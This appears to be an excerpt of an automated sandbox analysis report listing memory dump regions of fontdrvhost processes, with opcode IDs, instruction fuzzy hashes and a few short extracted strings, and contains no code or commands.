                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction ID: a9cb4e365ad23b9831725f4aa03d4e575c30127b084bcf6bb78e917607037863
                                                                                            • Opcode Fuzzy Hash: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction Fuzzy Hash: 2631CB7091891D8FDF94EF68C955BEEBBB2FF98301F10452AD509E7295CB34A845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1864ecb89c5491fb95168d35c3ba0242258d808e9898cf37327ec5fca8b02644
                                                                                            • Instruction ID: e47c1bc539285523cacb09278b4d2e56799dbb441042c0d5a691a39aa16d45cf
                                                                                            • Opcode Fuzzy Hash: 1864ecb89c5491fb95168d35c3ba0242258d808e9898cf37327ec5fca8b02644
                                                                                            • Instruction Fuzzy Hash: EB417CB0D096598FE755EFB4C8596EDBBB2FF49301F4041BAD049D76A2CB389881CB00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cb414b3a07a5a07ed75c2c00c64bb3a2ca6bda3bb1ba87d76b770af40fbbfe89
                                                                                            • Instruction ID: 382ec402529b13084661df4012e7ed4c398e9da9ef2d5b9379941086abc0c033
                                                                                            • Opcode Fuzzy Hash: cb414b3a07a5a07ed75c2c00c64bb3a2ca6bda3bb1ba87d76b770af40fbbfe89
                                                                                            • Instruction Fuzzy Hash: 3E3129A181DACA4FE751FF3CC8281E97FA0FF5A314F4541BAE888C75A3CA249845C381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction ID: 4a118f80d29acffadd2620a9fba48b8696279ebd510abe360731b6b5fe250a76
                                                                                            • Opcode Fuzzy Hash: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction Fuzzy Hash: 28217CB1908A5D8FDB81EF68D845AEDBFF1FF59311F00016AE408E72A2CA2498518790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction ID: 432b2cf65856f07ee614a3a6a66f1d6796b3a3c403ab108cc8ef2047a92d172e
                                                                                            • Opcode Fuzzy Hash: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction Fuzzy Hash: E3313C70D1961A8BE7A9EF34C5593B9B7A1EF58300F1045B9D95DE32E2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction ID: e5071992ebbd2b7bf7938c3c68a92fc153c802d39167efd51e264a03ea8cc777
                                                                                            • Opcode Fuzzy Hash: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction Fuzzy Hash: 112195B1D1D60A8BE768FF74C5456B9BBB1EF88310F104079D51D935E2DE38A941CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            • Opcode ID: d66be30f231bfc661c3720dfd1bf183480c241c5fbd0af9c4842e57ff97c60ea
                                                                                            • Instruction ID: 22087f27ef44cf1204183f38ac6b9879e7de16eb4f57a28464b955b8a401a4df
                                                                                            • Opcode Fuzzy Hash: d66be30f231bfc661c3720dfd1bf183480c241c5fbd0af9c4842e57ff97c60ea
                                                                                            • Instruction Fuzzy Hash: 91D2B5B0D196298FDBA9EF28C8957E9B7B1FF58301F1041E9D40DE7291CA35AA81CF44
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 28279720ac11accd523e71d63d1dd0db4aeb64ca8ec5e4528817a93f5346666a
                                                                                            • Instruction ID: 145128db7585d565c0a97f5b917c3049d8f9a3409ccdc064d77498163ac29a2a
                                                                                            • Opcode Fuzzy Hash: 28279720ac11accd523e71d63d1dd0db4aeb64ca8ec5e4528817a93f5346666a
                                                                                            • Instruction Fuzzy Hash: 43A1A574A18A1C8FDB94EF58C895BA8BBF1FF69301F4541A9D00DE7265CB74AC81CB41
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#6K
                                                                                            • API String ID: 0-771579418
                                                                                            • Opcode ID: cc2bb1870b1a4f7e2035aa45d99ce901111aaa223271d9c552a710ffc6fbdd80
                                                                                            • Instruction ID: 052f94421d7bca2183edbebabc3bd338e32968fd3d3d0e40c7776ffa04c16104
                                                                                            • Opcode Fuzzy Hash: cc2bb1870b1a4f7e2035aa45d99ce901111aaa223271d9c552a710ffc6fbdd80
                                                                                            • Instruction Fuzzy Hash: 3B21AEB1A0DA8A4FE7A5FE38C8646EABBB1FF45301F0444B9C14C931A2DE79A841C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 730232cb19ebfcd3da4f52a2369d474bf1c0f7f8d521ee0c8e8c2802bae3190f
                                                                                            • Instruction ID: b2ceadc735fb4bf10799cf7d9839eec85268a033fdc5e75dec4e2d8c08fdfb4f
                                                                                            • Opcode Fuzzy Hash: 730232cb19ebfcd3da4f52a2369d474bf1c0f7f8d521ee0c8e8c2802bae3190f
                                                                                            • Instruction Fuzzy Hash: E6E18FB1D1D6498FDB99EF68C8957E8BBF1EF48301F1440BAD14DE3292CA386881CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1f4d26f9abb695804f1c35a70ab6ee34eb0172df31006d6b1d6bf9e63a4dbd3
                                                                                            • Instruction ID: ae91b2ebe6ce58f306dafa6f90ccf9dc99a7557833e571dd313f3e11df4a32c1
                                                                                            • Opcode Fuzzy Hash: a1f4d26f9abb695804f1c35a70ab6ee34eb0172df31006d6b1d6bf9e63a4dbd3
                                                                                            • Instruction Fuzzy Hash: 02913BB191865A8FDB99EF68C4A57A8BBF1FF58301F1441B9D00DE7292CE386881CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1959704c634aab3e8ce1bed13c005107a8fa0cf23f267464677439b905f4d983
                                                                                            • Instruction ID: 8d02f1bef3abf0ae6089acb598aaa56f57e00e13f840795b7fd48bb0f8393d7c
                                                                                            • Opcode Fuzzy Hash: 1959704c634aab3e8ce1bed13c005107a8fa0cf23f267464677439b905f4d983
                                                                                            • Instruction Fuzzy Hash: 78611F7091894E8FDB85FF68C895AEAB7B1FF58310F1445B5D40DD7296CE34A882CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 10e4436094c945c525270252d138163737441468c574a9549260d472226aadb1
                                                                                            • Instruction ID: 1cffd629de0383113232cd2bb387fe8a70f126141173fc96cca19b3f70d0d010
                                                                                            • Opcode Fuzzy Hash: 10e4436094c945c525270252d138163737441468c574a9549260d472226aadb1
                                                                                            • Instruction Fuzzy Hash: 031160B0D0D64A8AE7B9BE38C5153BA7AB1EF84300F144879D51D936E2CE39A841C744
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d514de9fb4c57b957609c9b61cdb04d127c7f2cea40337bc16baee2c020c0b6e
                                                                                            • Instruction ID: a4393723d207f58ecf11bffe511ae1b9e0ed6a1aa6fd6588c2954f96a492223f
                                                                                            • Opcode Fuzzy Hash: d514de9fb4c57b957609c9b61cdb04d127c7f2cea40337bc16baee2c020c0b6e
                                                                                            • Instruction Fuzzy Hash: 451191B0D0DB4A8FE769AF38C5193B97BB1AF46310F0454B9D919D32E2CE3958418705
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4214bb6ce01d3c68cb16f9c3d3168b439cb68619c8bde80e0df2b3411f8dc38b
                                                                                            • Instruction ID: fea6e2160af8f069f1cd749cf54699387fa065290d086ad02136558a55d356cc
                                                                                            • Opcode Fuzzy Hash: 4214bb6ce01d3c68cb16f9c3d3168b439cb68619c8bde80e0df2b3411f8dc38b
                                                                                            • Instruction Fuzzy Hash: FD1182B0D0DA4A8AE7B9BE38C5153BA7BB1EF48310F144839D90ED32D5CE38A8418645
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a0fe9ace5652963a4f5aa3b2540a3e8bb87f5245b3ed300bd552ec9f6063f25
                                                                                            • Instruction ID: f62c1316d521a95636737209eac980d2abff9dfb8a6ede0e5f06051f39c65f96
                                                                                            • Opcode Fuzzy Hash: 7a0fe9ace5652963a4f5aa3b2540a3e8bb87f5245b3ed300bd552ec9f6063f25
                                                                                            • Instruction Fuzzy Hash: E801A1B090E64A8FE769EF34C5153B97BB1EF45300F044479D40AD32D2DE38A841DB05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03a24fff6af68fea6daf921549bda34836c14fb68b66805d906fee6297df555c
                                                                                            • Instruction ID: 650aee9b8faf55d8726e83c7b093326835066450e92d91ec7b7562eeaba2b267
                                                                                            • Opcode Fuzzy Hash: 03a24fff6af68fea6daf921549bda34836c14fb68b66805d906fee6297df555c
                                                                                            • Instruction Fuzzy Hash: EBF03CB081D68C8FDB42EF7889582ED7FB0FF1A301F0549ABD548D7162E73495448B01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e04294da906ed1182d9bb3c4cc428b1797b709dda7bef2a0e3fb2a585f2e689
                                                                                            • Instruction ID: 646328ca9b4ab1c16130d7e932a87a20535796150c5e13016ec07f493a713442
                                                                                            • Opcode Fuzzy Hash: 3e04294da906ed1182d9bb3c4cc428b1797b709dda7bef2a0e3fb2a585f2e689
                                                                                            • Instruction Fuzzy Hash: 64E0223280CA4C4BDB90BE68AC076A6BBB0EB85308F100069E64CD2091C2689565C380
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 77fc4edf1c680cb20268e4879671615dfdd61d107a97d5b2cefe209a49ea69c7
                                                                                            • Instruction ID: 0846e12476168981ecbf66115c3c7659451c75d9311fda47f38fbbb06952abef
                                                                                            • Opcode Fuzzy Hash: 77fc4edf1c680cb20268e4879671615dfdd61d107a97d5b2cefe209a49ea69c7
                                                                                            • Instruction Fuzzy Hash: 26E0DF7194CA4D8BDB96BF699C082987AF1FB9E308F01026AE08CC7191D7695B9AC741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7b2ba4f33ba3dd59b755952ae63c2341ca854a48f063ddad7480f58f92aea57
                                                                                            • Instruction ID: 6e97f9146dd6c5c120e281f2bc6d15deabd8c3a42fa47ff14f69d34ba426be17
                                                                                            • Opcode Fuzzy Hash: f7b2ba4f33ba3dd59b755952ae63c2341ca854a48f063ddad7480f58f92aea57
                                                                                            • Instruction Fuzzy Hash: F9E06F7284CE0C8FDB80BFACAC0028A7BB0FF8D308F00026AD40CCB194CB618690C302
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbb570fa2c2c9993704dd28a37707b0c7e1cc74f5d2e037a4dc5dac5c43e73f6
                                                                                            • Instruction ID: caf33f812aeb908ca9b4e040448c803a633907d5eb9ef7cbd2279c8dd5d49964
                                                                                            • Opcode Fuzzy Hash: cbb570fa2c2c9993704dd28a37707b0c7e1cc74f5d2e037a4dc5dac5c43e73f6
                                                                                            • Instruction Fuzzy Hash: 1FE01A71A2891E4BD744FFACDC855FDB772FB84250B004525D10DA3171CA202C14C780
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O6K$@O6K$PO6K$`O6K$pP6K
                                                                                            • API String ID: 0-3104620735
                                                                                            • Opcode ID: d1e9b96ab46e23de5630f38ad5a1dc2a3dd1a9b57a95f5337625fec4f3d72837
                                                                                            • Instruction ID: feeffee91369b6f9591cf7d7423ec0d2d651c497f87230a0fdb35a838d704fbd
                                                                                            • Opcode Fuzzy Hash: d1e9b96ab46e23de5630f38ad5a1dc2a3dd1a9b57a95f5337625fec4f3d72837
                                                                                            • Instruction Fuzzy Hash: 77510E97A0F6D60FF32675BDFC561D46FA0FFD22B474843F7D1888A09BA814854A42D0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85bb6ebe230c3bd84c9a450a1496b582d6d8037313243844264a5fe8f1be3746
                                                                                            • Instruction ID: 971664e7f1fa040f8645a22234c2d658e00c5730e8dc7ab8d870f828219eb992
                                                                                            • Opcode Fuzzy Hash: 85bb6ebe230c3bd84c9a450a1496b582d6d8037313243844264a5fe8f1be3746
                                                                                            • Instruction Fuzzy Hash: 8B618CB1A08A4E8FEB98FF78C8546AABBB1FF59301F4441BAD50DD71A1CA34A841C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6ab34938cbc1a25cf05912b17077070e05aa6018b3d13f8a6cf2498c1011dbf
                                                                                            • Instruction ID: 37d8bf80ff8b5893fc72e26cd4c3635a9303377cc987ffb69de0c212f4fcb06f
                                                                                            • Opcode Fuzzy Hash: f6ab34938cbc1a25cf05912b17077070e05aa6018b3d13f8a6cf2498c1011dbf
                                                                                            • Instruction Fuzzy Hash: 2D71E570909A2D8FDBA5EF58C894BE9BBB1FB58301F5001AAD40DE3251CB35AA84CF40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6a704edf074868f5b3f9a28bb705a4b9170f991e3149592c3064ef566645e91
                                                                                            • Instruction ID: 9d11d1c58f4a624b091f2ef6b51baf11e863063be56ef47ce1a0552d2cf2f7c1
                                                                                            • Opcode Fuzzy Hash: e6a704edf074868f5b3f9a28bb705a4b9170f991e3149592c3064ef566645e91
                                                                                            • Instruction Fuzzy Hash: 97619CB1A0D65D8FEB96FF68C9957A9BBF1FF55300F0481BAC10D932A2CA385945CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d545810b8717c2c4cdcb85687f87ab7fd05c13e6eaa1c36f6a745e8c4274407
                                                                                            • Instruction ID: cde1cf7d386e1c5d18015a94e7dcfc0ee061b981320201c34eb142c375dd1cc5
                                                                                            • Opcode Fuzzy Hash: 7d545810b8717c2c4cdcb85687f87ab7fd05c13e6eaa1c36f6a745e8c4274407
                                                                                            • Instruction Fuzzy Hash: 7761A5B0A18A1D8FDB94EFA8D855BEDBBB1FF59301F100169D40DE7291CA746881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9858f3a1d9fbe634691517fb6bc7cdabad9e2a32bc3c4d42161f8bbbdf4803cd
                                                                                            • Instruction ID: 201ec22ee353cbbb9ff7fd9869e4e83c570cedb6c1a53c29f43924768d5c08d7
                                                                                            • Opcode Fuzzy Hash: 9858f3a1d9fbe634691517fb6bc7cdabad9e2a32bc3c4d42161f8bbbdf4803cd
                                                                                            • Instruction Fuzzy Hash: 6051B6B1A18A5D8FDB98EFA8C8546EDBBB2FB98301F14412AD50DE7295CB345845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74628e0260009f2a801d9a2c61e65c36ff38436c858361401ff896966cfaf25d
                                                                                            • Instruction ID: a6d3f10478d615ecebfd3786f303fa6276ec2dff0254fb11326eb3161844fcfc
                                                                                            • Opcode Fuzzy Hash: 74628e0260009f2a801d9a2c61e65c36ff38436c858361401ff896966cfaf25d
                                                                                            • Instruction Fuzzy Hash: AA419AB1A1891D8FDB55EFA8D851AEEBBF1FF58300F10017AE40DE7295DA34A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 321ac1e08239bff7fac84b3e2917bdf65bc508e82967751c66dda906d58a17d5
                                                                                            • Instruction ID: f23431e7a0d8dae984203265c1f2eba93071e2271146d110dfc72c657bc2d927
                                                                                            • Opcode Fuzzy Hash: 321ac1e08239bff7fac84b3e2917bdf65bc508e82967751c66dda906d58a17d5
                                                                                            • Instruction Fuzzy Hash: A051897190D2898FEB56AF78C8652FE7FF0FF06300F0545BAD548E71A2DA285A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baf4aaa42ef4f71c1108a5467df425d5859d5e3931525b888cd7cd968c65788e
                                                                                            • Instruction ID: acc3d9ef9f9bd59e7fe2033da0fbf00cfd133db8f07a9b66e5788583b26d3473
                                                                                            • Opcode Fuzzy Hash: baf4aaa42ef4f71c1108a5467df425d5859d5e3931525b888cd7cd968c65788e
                                                                                            • Instruction Fuzzy Hash: 14410671D0961D8FDB51EFB8D4846EEBBB0FF19300F50056AE40DE3292DA78A945CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf788fbede743f0de0512d95c296e90d717203a3b7affd9e45bfa3f16efb612a
                                                                                            • Instruction ID: 4ef6a42d80b2563c0416e1e240949cf01da11c28a2653c325da86dcda20d22e0
                                                                                            • Opcode Fuzzy Hash: bf788fbede743f0de0512d95c296e90d717203a3b7affd9e45bfa3f16efb612a
